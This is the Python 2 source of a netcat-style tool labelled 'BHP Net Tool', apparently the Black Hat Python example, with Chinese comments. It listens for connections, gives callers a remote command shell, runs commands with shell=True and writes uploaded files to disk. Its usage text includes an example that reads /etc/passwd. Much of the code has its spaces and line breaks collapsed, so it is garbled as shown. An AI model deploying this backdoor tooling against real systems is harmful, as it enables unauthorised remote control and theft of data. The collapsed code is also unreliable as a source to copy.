#! /usr/bin/env python#coding=utf-8
importsysimportsocketimportgetoptimportthreadingimportsubprocess#定义一些全局变量
listen =False
command=False
upload=False
execute= ""target= ""upload_destination= ""port=0defrun_command(command):#换行
command =command.rstrip()#运行明来并输出返回
try:
output= subprocess.check_output(command,stderr=subprocess.STDOUT, shell=True)except:
output= "Failed to execute command. \r\n"
#将输出发送
returnoutputdefclient_handler(client_socket):globaluploadglobalexecuteglobalcommand#检测上传文件
iflen(upload_destination):#读取所欲的字符写下目标
file_buffer = ""
#持续读取数据直到没有符合的数据
whileTrue:
data= client_socket.recv(1024)if notdata:break
else:
file_buffer+=data#现在我们接受这些数据并将他们写出来
try:
file_descriptor= open(upload_destination,"wb")
file_descriptor.write(file_buffer)
file_descriptor.close()#确认文件已经写出来
client_socket.send("Successfully saved file to %s\r\n" %upload_destination)except:
client_socket.send("Falied to save file to %s\r\n" %upload_destination)#检测命令执行
iflen(execute):#运行命令
output =run_command(execute)
client_socket.send(output)#如果需要一个命令行shell,那么我们进入另一个循环
ifcommand:whileTrue:#跳出一个窗口
client_socket.send("")#现在我们接收文件直到发现换行符(enter key)
cmd_buffer = ""
while "\n" not incmd_buffer:
cmd_buffer+= client_socket.recv(1024)#返还命令输出
response =run_command(cmd_buffer)#返回响应数据
client_socket.send(response)defserver_loop():globaltargetglobalport#如果没有定义目标,那么我们监听所有端口
if notlen(target):
target= "0.0.0.0"server=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((target,port))
server.listen(5)whileTrue:
client_socket, addr=server.accept()#分拆一个线程处理新的客户端
client_thread = threading.Thread(target=client_handler,args=(client_socket,))
client_thread.start()defclient_sender(buffer):
client=socket.socket(socket.AF_INET, socket.SOCK_STREAM)try:#连接到目标主机
client.connect((target,port))iflen(buffer):
client.send(buffer)whileTrue:#现在等待数据回传
recv_len = 1response= ""
whilerecv_len:
data= client.recv(4096)
recv_len=len(data)
response+=dataif recv_len < 4096:break
printresponse,#等待更多的输入
buffer = raw_input("")
buffer+= "\n"
#发送出去
client.send(buffer)except:print "[*] Exception! Exiting."
#关闭连接
client.close()defusage():print "BHP Net Tool"
print "Usage: bhpnet.py -t target_host -p port"
print "-l --listen -listen on [host]:[port] for incoming connections"
print "-e --execute=file_to_run - execute the given file upon receiving a connection"
print "-c --command - initialize a command shell"
print "-u --upload=destination - upon receiving connection upload a file and write to [destination]"
print "Examples:"
print "bhpnet.py -t 192.168.0.1 -p 5555 -l -c"
print "bhpnet.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe"
print "bhpnet.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\""
print "echo 'ABCDEF' | ./bhpnet.py -t 192.168.11.12 -p 135"sys.exit(0)defmain():globallistenglobalportglobalexecuteglobalcommandglobalupload_destinationglobaltargetif not len(sys.argv[1:]):
usage()#读取明来行选项
try:
opts, args= getopt.getopt(sys.argv[1:],"hle:t:p:cu:", ["help","listen","execute","target","port","command","upload"])exceptgetopt.GetoptError as err:printstr(err)
usage()for o,a inopts:if o in ("-h","--help"):
usage()elif o in ("-l","--listen"):
listen=Trueelif o in ("-e", "--execute"):
execute=aelif o in ("-c", "--commandshell"):
command=Trueelif o in ("-u","--upload"):
upload_destination=aelif o in ("-t", "--target"):
target=aelif o in ("-p", "--port"):
port=int(a)else:assert False,"Unhandled Option"
#我们是进行监听还是仅从标准输入发送数据
if not listen and len(target) and port >0:#从明来行读取内存数据
#这里将阻塞,所以不在向标准输入发送数据时发送CTRL-D
buffer =sys.stdin.read()#发送数据
client_sender(buffer)#我们开始监听并准备上传,执行命令
#放置一个反弹shell
#取决于上面的明来行选项
iflisten:
server_loop()
main()